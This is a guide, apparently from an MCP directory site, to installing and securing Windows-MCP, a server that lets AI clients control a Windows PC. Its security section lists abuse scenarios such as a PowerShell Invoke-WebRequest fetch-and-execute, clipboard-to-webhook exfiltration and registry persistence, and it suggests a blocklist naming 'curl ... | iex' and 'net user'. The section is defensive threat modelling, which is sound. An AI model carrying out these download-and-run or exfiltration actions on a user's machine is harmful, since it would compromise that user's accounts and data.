Windows-MCP: AI Computer Use on Windows
Windows-MCP is the MCP server that turns a regular Windows PC into something Claude, Cursor, or Codex CLI can drive directly — click, type, screenshot, run PowerShell, edit the registry. It works with any LLM (no vision required) and installs in one uvx command. It is also the most dangerous server you can wire into a model, because it inherits every permission of the user who launched it. This guide covers what each tool does, the install path for every client, what breaks on Windows Store Claude and inside WSL, what the project cannot do (yet), and the safety pattern we use before pointing it at anything important.

On this page · 18 sections▾
- TL;DR + what you need
- What Windows-MCP is
- Why it exists
- The 19 tools, mapped
- Install (every client)
- Smallest end-to-end example
- Snapshot vs Screenshot
- What we got wrong
- Common mistakes
- Security: the section that matters
- Performance and limits
- Who this is for / not for
- Community signal
- The verdict
- The bigger picture
- FAQ
- Glossary
- All sources & links
TL;DR + what you actually need
The four things you will keep typing if you use Windows-MCP:
- Install command:
uvx windows-mcp serve— that is the whole runtime. PyPI ships the package;uvfetches Python 3.13, builds the venv, and starts the MCP server over stdio. - Repo:
github.com/CursorTouch/Windows-MCP— MIT-licensed, maintained by Jeomon George under the CursorTouch org. Python 3.13+, Windows 7 through 11. - Tools exposed: 19 of them. Click, Type, Scroll, Move, Shortcut, Wait, WaitFor, Screenshot, Snapshot, App, PowerShell, FileSystem, Scrape, MultiSelect, MultiEdit, Clipboard, Process, Notification, Registry. Full list below.
- What it cannot do: click through UAC prompts (Secure Desktop isolation), automate video games, do reliable per-character text selection inside a paragraph, or substitute for an IDE's edit primitives. Workarounds in the “what we got wrong” section.
Before you wire it up
Windows-MCP has the same blast radius as your Windows user account. If your client supports “auto-approve all tools,” turn that off before installing. The per-tool approval prompt is the only thing standing between “the agent did something useful” and “the agent typed your password into a Discord chat.”
What Windows-MCP actually is
Most MCP servers are wrappers around an API: Notion-MCP hits the Notion REST API, Slack-MCP hits Slack, Stripe-MCP hits Stripe. Windows-MCP is in a different category — it is a wrapper around the operating system itself. It exposes the same primitives a human uses with mouse, keyboard, and screen, then ships them as MCP tools your model can call.
Concretely, it spawns a local Python subprocess that talks Microsoft UI Automation (UIA) to enumerate the accessibility tree of every running window, uses Win32 SendInput to inject mouse and keyboard events, calls BitBlt-equivalent capture for screenshots, and shells out to powershell.exe for the rest. The MCP server layer wraps all of that in JSON-RPC over stdio. From the model’s perspective it is just another tool catalog; from Windows’s perspective it is a perfectly normal user-mode program doing perfectly normal user-mode things.
Jeomon George shipped the first cut in May 2025. The README claims Windows-MCP has “reached 2M+ Users in Claude Desktop Extensions” — treat that as a vendor figure rather than an audited number, but the trajectory is real: the repo sits in the top tier of Claude Desktop extension installs and shows up in every serious Windows-agent demo we have seen this year.
Why it exists
Before Windows-MCP, getting an LLM to do anything outside the chat window on Windows required one of three uncomfortable paths. Either you wrote your own PyAutoGUI glue (no UIA awareness, brittle to DPI changes, breaks the moment a window moves). Or you used Anthropic’s Computer Use API, which is vision-only, slow, and only available in Claude’s hosted product. Or you ran Microsoft’s OmniParser to produce screenshot embeddings and built a custom agent loop around it.
Windows-MCP collapses all three into one stdio server. It reads the UIA tree directly — so it has element IDs, control types, and accessible names without needing a vision model. It exposes the result as MCP, which means any client that speaks the protocol can drive it: Claude Desktop, Cursor, Codex CLI, Gemini CLI, Qwen Code, your own LangGraph script. The cost of integration drops from “build the agent loop” to “add four lines to a JSON file.”
The 19 tools, mapped to what you actually do
The full tool catalogue, grouped by mental category. Each one is a single MCP tool with typed arguments — your model picks them like any other tool call.
Input (the “hands”)
- Click — click a screen coordinate or UIA element
- Type — type text into a target element, optional clear-first
- Scroll — vertical or horizontal scroll on a window/region
- Move — pointer movement; supports drag
- Shortcut — keyboard combos like
Ctrl+C,Win+L - MultiSelect — bulk selection with optional Ctrl modifier
- MultiEdit — type into multiple input fields in one call
Sensing (the “eyes”)
- Screenshot — fast pixel capture with cursor position + window list
- Snapshot — full UIA tree with interactive element IDs
- WaitFor — poll until text, window, element, or focus appears
- Wait — plain duration-based pause
Apps & windows
- App — launch, resize, move, switch between apps
- Process — list or terminate running processes
- Notification — show a Windows toast
System & data
- PowerShell — run a shell command, return stdout/stderr/exit
- FileSystem — read, write, copy, move, delete, list, search
- Registry — read/write Windows Registry keys
- Clipboard — read or set the Windows clipboard
- Scrape — fetch and extract content from a webpage
Two patterns to internalize. First: Click and Type take either a coordinate or a UIA element ID from a Snapshot. Coordinates are brittle (window moves, resolution changes); IDs are stable across small rearrangements. The model usually picks IDs once it has a Snapshot. Second: PowerShell is the escape hatchfor anything not covered by the other 18 tools — install software, manage services, query WMI, configure firewall. It is also the tool with the largest blast radius, so its tool-call approval is the one you actually read.
Install (every client)
Prereqs once: winget install astral-sh.uv (or the PowerShell installer irm https://astral.sh/uv/install.ps1 | iex). That installs uv and uvx; the Windows-MCP package itself is fetched on first run.
Claude Desktop
Two paths. If you have the extension installed via Claude Desktop’s in-app marketplace, setup is one click. If you are wiring it manually, edit %APPDATA%\Claude\claude_desktop_config.json:
{
"mcpServers": {
"windows-mcp": {
"command": "uvx",
"args": ["windows-mcp", "serve"]
}
}
}Restart Claude Desktop. If you installed Claude Desktop from the Microsoft Store, the extension path resolves to a virtualized location that breaks editable builds — see the common mistakes section for the fix.
Cursor
Settings → MCP → Add new global MCP server. Paste the same JSON shape but in the Cursor format (Cursor writes to ~/.cursor/mcp.json on Windows it’s %USERPROFILE%\.cursor\mcp.json):
{
"mcpServers": {
"windows-mcp": {
"command": "uvx",
"args": ["windows-mcp", "serve"]
}
}
}Claude Code (from WSL)
This one is genuinely tricky — Claude Code lives in Linux (WSL) but Windows-MCP must execute on the Win32 side. The reliable invocation, surfaced from issue #195, is:
# From WSL:
claude mcp add windows-mcp --transport stdio -s user -- \
powershell.exe -Command "C:\Users\<you>\.local\bin\uvx.exe windows-mcp serve"The powershell.exe wrapper is what bridges the WSL/Win32 boundary. uvx.exe alone works in shell tests but Claude Code needs the server registered via claude mcp add, not by hand-editing ~/.config/Claude/ JSON.
Codex CLI / Gemini CLI / Qwen Code
All three speak MCP natively and accept the same uvx windows-mcp serve command in their MCP config files. Codex’s config lives at %USERPROFILE%\.codex\config.toml:
[mcp_servers.windows-mcp]
command = "uvx"
args = ["windows-mcp", "serve"]The smallest end-to-end example
Fresh install, fresh Claude Desktop session, single prompt: “Open Notepad, type ‘hello from Claude’, and save it as C:\Users\me\hello.txt”. Here is what the model does, in tool calls. Each line is one tool invocation; the indented bullet is what the model passes in.
App
app: "notepad.exe"
action: "launch"
→ returns { window_id: 0xAB12, ready: true }
Type
element: window 0xAB12 / "Text editor"
text: "hello from Claude"
→ returns { typed: 17 chars }
Shortcut
keys: ["Ctrl", "S"]
→ returns { sent: true }
WaitFor
text: "Save As"
timeout_ms: 5000
→ returns { matched: true, window_id: 0xCD34 }
Type
element: window 0xCD34 / "File name:"
text: "C:\Users\me\hello.txt"
clear_first: true
Click
element: window 0xCD34 / "Save"
→ returns { clicked: true }Six tool calls, ~3 seconds end-to-end. The model never sees a pixel — it is operating purely on the UIA tree returned by Snapshot calls that Claude Desktop interleaves automatically. That is the whole pitch in one example.
Snapshot vs Screenshot — the call that decides everything
The first thing an agent typically does on a new window is pick which sensing tool to call: Snapshot or Screenshot. They look similar in the catalogue but they fail in opposite ways, and the choice you encourage in your prompt drives the whole agent’s reliability.
Snapshot returns the UIA accessibility tree: every interactive element with an ID, a control type (Button, Edit, ComboBox), an accessible name, a bounding rect, and parent/child relations. It is the “structured” option. A model with a Snapshot can confidently click element 0x4F2 labelled “Save” even if the dialog moves. The downsides: it is slower on huge windows (Electron apps with thousands of nodes can take 200–500ms), Firefox historically had a degraded UIA tree until v0.8.1 added an IAccessible2/MSAA fallback, and not all custom-drawn surfaces (game UIs, some Adobe products) expose anything useful.
Screenshot returns pixels plus cursor position and a window list — no element IDs. It is fast (sub-50ms typically) and works for everything that draws to the screen, including the custom surfaces UIA fails on. The downside: the model has to do its own visual grounding, which means either a vision-capable LLM, or your agent doing OCR / template matching on the side. For non-vision models, Snapshot is the right default and you fall back to Screenshot only when Snapshot returns an empty tree.
Opinionated take: start every agent prompt with “always prefer Snapshot; only call Screenshot if Snapshot returns no interactive elements.” You will save token budget and avoid the entire class of “the model clicked at coordinate (412, 280) and missed by one pixel because DPI scaling changed” bugs.
What we got wrong
Three things we assumed Windows-MCP could do, and ended up burning hours on.
1. We thought Click + Type could handle a UAC prompt. They cannot. UAC dialogs render on the Secure Desktop, a separate desktop object isolated from user-mode processes for anti-spoofing reasons. The agent’s Screenshot returns the dim wallpaper, Click goes to the void, Type goes to the void, the run stalls until a human clicks. We hit this within ten minutes of trying to script “install Node.js silently” the first time. Workarounds: pre-elevate the shell, use winget with already-trusted publishers, or watch issue #212 for the proposed LocalSystem service mode.
2. We tried to use Type for IDE editing. The Type tool inputs whole strings into a focused field. In an IDE that means it appends to the current cursor position with no concept of multi-line selection, indent preservation, or column navigation. It works fine for “type a URL into the address bar” and hopeless for “edit line 42 of this Python file.” If you want the model to edit code, give it a filesystem MCP server (Desktop Commander, the official filesystem server, or the IDE’s own MCP) and let it write files directly — Windows-MCP’s Type was never designed for diff-based editing.
3. We assumed Process / PowerShell ran with our user’s effective permissions. They do — but Windows runs your interactive user at medium integrity even if you are an admin, until UAC elevates the token. Windows-MCP cannot trigger UAC programmatically, so every “why does schtasks /RU SYSTEM fail with Access Denied?” question gets the same answer: the agent has the same token your unelevated PowerShell has. Pre-run privileged setup in an elevated terminal before handing the box to the agent.
Common mistakes (sourced from GitHub Issues)
Installing the Microsoft Store version of Claude Desktop and expecting paths to match
Root cause: MSIX filesystem virtualization redirects the extension directory to %LOCALAPPDATA%\Packages\Claude_pzs8sxrjxfjjc\LocalCache\..., but the manifest’s $${__dirname} still resolves to %APPDATA%\Roaming\Claude\... which doesn’t exist. uv run --directory fails with egg_base: ‘.’ does not exist.
Fix: change the manifest to invoke the prebuilt venv exe directly, or use uvx windows-mcp from PyPI which avoids the editable-build path entirely. Issue #213 tracks the manifest fix.
Forgetting powershell.exe when wiring from WSL
Root cause: WSL exposes uvx.exe on PATH but Claude Code spawns it without the Win32 environment block, so the Python subprocess can’t resolve Windows DLLs or paths predictably.
Fix: always invoke through powershell.exe -Command, which gives the child process a real Win32 session.
Using $env:COMPUTERNAME in scripts run via the PowerShell tool
Root cause: the subprocess inherits a stripped environment block. COMPUTERNAME is populated by the session manager at logon and is absent in non-interactive process environments.
Fix: use [System.Environment]::MachineName — it reads from the .NET runtime, not the env block, and returns the correct hostname every time.
Trusting Click’s coordinate mode across DPI changes
Root cause: coordinate-based clicks don’t adjust for per-monitor DPI; a 1920×1080 laptop with 150% scaling and an external 4K monitor at 100% will see Click coordinates shift by the scale factor depending on which display the target window is on.
Fix: always click UIA element IDs from Snapshot, not raw coordinates. The IDs carry their own DPI-aware bounding rects.
Security: the section that matters
Windows-MCP is the most dangerous server in the MCP ecosystem to misconfigure. The README states this plainly: “Windows-MCP operates with full system access and can perform irreversible operations.” The threat model is not abstract. With Click, Type, and App, a model can:
- Open your browser to an authenticated tab and act as you on any site you’re logged into.
- Type into your password manager and exfiltrate via Clipboard + a webhook.
- Run
powershell -Command "Invoke-WebRequest ..."to fetch and execute arbitrary code. - Edit the Registry to add a persistence mechanism that survives reboot.
- Send a Slack message under your account before you notice.
All of these are within scope of legitimate use. The question is whether the model triggers them on purpose (prompt injection from a scraped page is the realistic vector). The mitigations that actually work, ranked from weakest to strongest:
- Keep per-tool approval on. If your client supports an “auto-approve all tools” flag, never enable it with Windows-MCP wired in. The approval prompt is the only thing forcing a human to look at every
powershellinvocation. - Document blocked commands. Windows-MCP does not ship a built-in command allowlist, so wrap the PowerShell tool with a system prompt that enumerates what it must not run (
curl ... | iex,rmof system paths,net user, registry writes outsideHKCU). The model will not always obey, but it raises the floor. - Scope by VM. Run Windows-MCP inside a dedicated Windows 11 VM with no shared credentials, no enterprise SSO, and snapshot-based reset. The repo explicitly recommends this for any unattended use.
- Pair with a policy proxy. Issue #189 discusses PolicyLayer/Intercept as a wrapper that enforces rate limits and require-approval rules on individual tools.
The other thing worth knowing: in May 2026 the project patched GHSA-vrxg-gm77-7q5g — the HTTP transports (sse, streamable-http) were emitting Access-Control-Allow-Origin: *, which let any web page in any tab cross-fetch the MCP endpoint if you exposed it over network. Fixed in v0.7.5; if you run an HTTP transport, you want to be on a recent release with the host-header / CORS check enabled.
Performance and limits
Per the README, typical tool latency is 0.2 to 0.5 seconds end-to-end — consistent with our own runs on a mid-tier laptop. Breakdown:
- Click / Type / Shortcut: ~50–100ms; pure Win32 injection.
- Screenshot: ~30–60ms for a single primary display; multi-monitor adds a frame.
- Snapshot (UIA tree): 100–500ms depending on window complexity. Electron apps and modern Office windows are the slow end. v0.7.4 halved this by deduplicating COM calls per node.
- PowerShell: bounded by whatever PowerShell is doing. Spawning
pwshcold-starts ~300ms; subsequent calls reuse the process. - App launch: dominated by the app itself; the tool returns the moment the window is ready.
Hard limits worth knowing:
- Can’t select arbitrary text ranges inside a paragraph — UIA exposes text by element, not by character range.
- Can’t automate most video games — DirectX surfaces don’t expose a UIA tree, and Snapshot returns empty.
- Type-Tool input goes whole-string; no in-line IDE editing primitives.
- App-Tool launch assumes English-locale process names by default.
Who this is for / who it is not for
Use it if you...
- Are running QA on a Windows desktop app and want the model to drive UI flows.
- Want one-prompt setup of dev environments inside a throwaway Windows VM.
- Need to drive enterprise Windows apps (SAP GUI, legacy WPF) that have no API.
- Are building an agent that bridges chat → desktop → PowerShell.
- Want to use a non-vision model for desktop automation (this is the standout feature).
Skip it if you...
- Need cross-platform support — macOS and Linux are out of scope (use Anthropic Computer Use or OmniParser).
- Want IDE-grade code editing — pair with a filesystem MCP instead.
- Are automating games or DirectX surfaces — UIA tree is empty there.
- Cannot run a per-tool approval prompt and have no VM for sandboxing.
- Need elevated/SYSTEM operations on every call — UAC isolation makes that intractable today.
Community signal
The repo’s issue tracker is the most honest source of community sentiment. Three threads worth reading before you commit:
- #212 — Add optional service mode to see and handle UAC prompts is the longest, most thoughtful feature request on the repo. It reads like a small RFC: explains why the current user-mode design hits a wall on autonomous Windows automation, proposes a two-process design (LocalSystem service + user-session broker), enumerates the security caveats, and offers a prototype PR. Open at time of writing; the resolution will reshape what fully-unattended Windows-MCP agents can do.
- #189 — Add policy enforcement for OS-level UI automation is the contrarian voice. Its core argument: any server with
mouse_click+keyboard_typeis “a full system access vector,” and that deserves more than a per-tool approval prompt. It proposes wrapping Windows-MCP in a policy proxy with rate limits and require-approval rules. We agree. - #194 — Support for automating Windows Server via RDP captures the enterprise-cloud gap: Windows-MCP is local-only today, and the streamable-http transport is the documented workaround for remote work. First-class RDP transport is requested but not on the near-term roadmap.
On Hacker News, the project’s own submission (HN 44375240) was quiet, but the broader Windows-on-MCP conversation — including Microsoft’s own May 2025 post on securing MCP on Windows — surfaces the same tension: the desktop is the most useful thing to give an agent, and also the most dangerous.
The verdict
Our take
Windows-MCP is the right tool for Windows desktop automation in 2026, full stop — especially if you want a non-vision model in the loop. Install it inside a Windows VM with snapshots, leave per-tool approval on, and pair it with a filesystem MCP for editing work. Skip it on your daily-driver laptop unless you are very disciplined about which model you give it to, and skip it entirely if you need cross-platform (use Anthropic Computer Use or OmniParser) or fully unattended runs that touch UAC (wait for the LocalSystem service mode in #212).
The bigger picture
Windows-MCP sits in a three-way landscape of computer-use approaches. Each one optimizes for a different bottleneck.
- Windows-MCP — UIA-tree first, works with any text-only LLM, Windows-only, local install. Best when you have a Windows-only task and want to bring your own model.
- Anthropic Computer Use — pixel + vision-first, Claude-only, hosted. Best when you want cross-platform (it works on Linux desktops out of the box via the reference container) and don’t mind the higher per-step latency and Claude lock-in.
- Microsoft OmniParser + UI-TARS — pure-vision GUI agents from Microsoft Research and ByteDance. Best when accessibility trees don’t exist (games, custom-drawn surfaces, mobile screen mirroring) and you have GPU budget for vision inference on every step.
The longer-term trajectory: Microsoft is pushing “MCP native to Windows 11” (the May 2025 Windows blog post above), which means Windows-MCP’s “wrap the OS in MCP” pattern is likely to get a first-party variant. The bet for Windows-MCP’s relevance is that it stays the lightweight, no-vendor, any-model option even after the OS ships its own. The bet is reasonable.
Frequently asked questions
What is Windows-MCP?
Windows-MCP is an open-source MCP server by Jeomon George (CursorTouch) that lets Claude, Cursor, Codex CLI, or any MCP-speaking client drive a Windows PC. It exposes 19 tools — Click, Type, Scroll, Screenshot, Snapshot, App, PowerShell, FileSystem, Scrape, Clipboard, Process, Registry and a handful more — so the model can move the mouse, type into apps, run shell commands, read files and inspect the UI tree. Python 3.13+, MIT-licensed, Windows 7 through 11. Install with `uvx windows-mcp`.
Do I need GPT-4 Vision or Claude Vision to use Windows-MCP?
No. Windows-MCP works with text-only models because it pulls the Windows UI Automation (UIA) accessibility tree, not screenshots — so Click, Type and friends operate on element IDs the way a screen reader would. The Screenshot and Snapshot tools exist for when a vision model wants to look, but the project's whole pitch is that you don't have to: GPT-4o-mini, Claude Sonnet, and even local models like Qwen-Coder can run agents on it. That's the main thing it does differently from OmniParser or UI-TARS, both of which assume a vision backbone.
Is Windows-MCP safe to install?
It is exactly as safe as handing your laptop password to whoever is driving the model. Windows-MCP runs in your user-mode session and inherits every permission you have: it can read your files, open your browser to authenticated tabs, type into your password manager, and run PowerShell. The README states this plainly: "Windows-MCP operates with full system access and can perform irreversible operations." The only safety control is the human-approval prompt your MCP client shows on each tool call — keep that on. For untrusted prompts or autonomous agents, run it in a Windows VM or test box, never on the laptop with your real keys.
Can Windows-MCP click through a UAC prompt?
No. UAC consent prompts render on a separate Windows desktop object called the Secure Desktop, isolated from user-mode processes for anti-spoofing reasons. Windows-MCP runs as your user, so its Screenshot tool sees the dim frozen wallpaper and its Click / Type calls fall on the floor. There is an open issue (#212) proposing an optional LocalSystem service mode to fix this, but until that lands, an agent that triggers a UAC dialog stalls until a human clicks. Plan installs and admin tasks accordingly, or pre-run them in an elevated terminal.
Does Windows-MCP work with Claude Code or WSL?
Yes — but the wiring is unusual. Claude Code typically runs inside WSL (Linux), while Windows-MCP must execute on the Windows side. The working pattern, surfaced from issue #195, is to register the server via `claude mcp add windows-mcp --transport stdio -s user -- powershell.exe -Command "C:\Users\<you>\.local\bin\uvx.exe windows-mcp"`. The `powershell.exe` wrapper bridges the WSL → Win32 boundary. Direct invocation of `uvx.exe` from WSL works but Claude Code needs the server registered explicitly via its CLI, not by hand-editing JSON.
What's the difference between Windows-MCP and Windows-Use?
Same author, different layer. Windows-MCP is the protocol server — it exposes desktop tools over MCP and any client can drive it. Windows-Use is a higher-level agent built on top of Windows-MCP that bundles its own loop, prompt, and decision logic. Use Windows-MCP when you want Claude, Cursor or Codex to do the thinking and just need the desktop primitives. Use Windows-Use when you want a turnkey Windows agent without writing the orchestration yourself. Both live under the CursorTouch GitHub org.
Can I run Windows-MCP on a remote server via RDP?
Not directly. Windows-MCP is local-only by design — it runs on the Windows machine it's automating. For remote servers, install it on the server itself and expose the MCP endpoint over `--transport streamable-http`. Then your local client connects across the network. The repo's open issue #194 tracks first-class RDP transport as a feature request; today it's not supported. For multi-instance cloud automation (EC2, Azure VMs) the streamable-http transport plus an SSH tunnel is the documented path.
Why does $env:COMPUTERNAME return empty when called via Windows-MCP?
The PowerShell tool spawns a subprocess without inheriting the full Windows user environment block. `COMPUTERNAME` is populated by the session manager at logon and is missing in stripped non-interactive process environments. Workaround: use `[System.Environment]::MachineName`, which reads from the .NET runtime and returns the correct hostname inside the Windows-MCP context. Other `$env:` variables (USERDOMAIN, USERPROFILE flavors) may show the same gap. This is documented in issue #208.
Glossary
- MCP
- Model Context Protocol — the JSON-RPC wire format Anthropic released in late 2024 that lets any LLM client talk to any tool server.
- UIA
- UI Automation — Microsoft’s accessibility tree API that exposes every UI element with an ID, role, and bounding rect.
- Secure Desktop
- A separate Windows desktop object that hosts UAC consent prompts, isolated from user processes for anti-spoofing.
- UAC
- User Account Control — the elevation mechanism in Windows that requires a click to promote a process from medium to high integrity.
- stdio transport
- MCP transport mode where the client spawns the server as a subprocess and talks over stdin/stdout. Local-only.
- Streamable HTTP transport
- MCP transport mode for remote servers over HTTP with server-sent events. Windows-MCP supports it for cross-host setups.
- uvx
- A shim from Astral’s
uvPython tooling that runs a one-shot PyPI package without installing it globally. - MSIX
- Microsoft’s app-packaging format used by Microsoft Store installs. Uses filesystem virtualization that confuses path-resolving build tools.
- DPI scaling
- Per-monitor scale factor in Windows that turns logical coordinates into device pixels. Why raw Click coordinates break across mixed-DPI setups.
- Snapshot vs Screenshot
- In Windows-MCP, Snapshot returns the structured UIA tree; Screenshot returns pixels. Prefer Snapshot when the app exposes it.
- DXT extension
- Claude Desktop’s extension package format. Windows-MCP ships as a DXT plus a raw
uvxinstall option. - Computer Use
- Anthropic’s name for the broader category of LLM-driven desktop control. Windows-MCP is one implementation of the idea.
All sources & links
Primary
- GitHub: CursorTouch/Windows-MCP — README, tool catalogue, install docs.
- Windows-MCP releases — full version history.
- GHSA-vrxg-gm77-7q5g — the May 2026 CORS / DNS rebinding advisory.
- CursorTouch/Windows-Use — the agent layer built on Windows-MCP.
- Jeomon George — project maintainer.
Community
- Issue #212 — LocalSystem service mode for UAC
- Issue #189 — policy enforcement (PolicyLayer/Intercept)
- Issue #195 — WSL / Claude Code setup
- Issue #194 — remote Windows Server via RDP
- Issue #208 — $env:COMPUTERNAME empty
- Issue #213 — Microsoft Store Claude path resolution
- Hacker News — Windows-MCP submission
Context & comparison
- Microsoft — Securing MCP on Windows
- Microsoft Research — OmniParser V2
- UI-TARS paper (ByteDance)
- Windows Agent Arena benchmark
Related on MCP.Directory